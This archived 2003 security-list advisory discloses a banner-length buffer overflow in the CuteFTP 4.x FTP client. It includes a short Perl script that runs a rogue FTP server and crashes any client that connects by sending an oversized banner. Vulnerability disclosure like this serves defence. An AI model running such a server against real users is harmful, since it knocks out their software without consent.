[NT] CuteFTP Banner Buffer Overflow

From: support@securiteam.com
Date: 01/05/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 5 Jan 2003 12:19:31 +0200

    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      CuteFTP Banner Buffer Overflow

    SUMMARY

     <http://www.CuteFTP.com> CuteFTP is a Windows based File Transfer
    Protocol (FTP) client that allows users to utilize the capabilities of FTP
    without having to know all the details of the protocol itself. CuteFTP
    simplifies FTP by offering a user-friendly Windows interface instead of a
    cumbersome command line utility. CuteFTP gives novice PC users the ability
    to upload, download and edit files on remote FTP servers around the world.
    A client side vulnerability in the product allows remote servers to cause
    the client to crash by sending it a large banner.

    DETAILS

    Vulnerable systems:
     * CuteFTP version 4.x

    It's possible to crash CuteFTP by sending long (more than 2048 bytes) FTP
    banner to it.

    Exploit:
    #!/usr/bin/perl
    #Here is an example of ftp-server. It will freeze each
    #CuteFTP-user, that try to connect to it.
    use IO::Socket;
    $port = "21";
    $data = "a";
    $num = "2049";
    $buf .= $data x $num;
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM,
    Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     print $client "$buf";
     print "OK\n";
     close($client);
    }
    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:grey_1999@mail.ru> D4rkGr3y.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • CuteFTP: buffer overflow
      ... "CuteFTP is a Windows based File Transfer Protocol client that ... allows users to utilize the capabilities of FTP without having to ... by offering a user-friendly Windows interface instead of a cumbersome ...
      (Bugtraq)
    • [VulnWatch] CuteFTP: buffer overflow
      ... "CuteFTP is a Windows based File Transfer Protocol client that ... allows users to utilize the capabilities of FTP without having to ... by offering a user-friendly Windows interface instead of a cumbersome ...
      (VulnWatch)
    • Re: Problem using ftp hyperlink
      ... Michael, it might be something to do with CuteFTP. ... I used WS-FTPro for a time and it does integrate with IE - intercepting FTP ... > would not download from the downloads.netgear.com site without a password. ...
    • Wierd Ftp connection problem from client to server
      ... One of my customers is trying to connect via "CuteFTP" to our server ... 220 xyz.com FTP server ready. ... 230 User abc logged in. ...
      (comp.os.linux)
    • IIS 5.0 ftp and transfer resumes
      ... I could use CuteFtp to connect to my computer from ... work and hit my ftp to send stuff back and forth, ... the server or client end? ...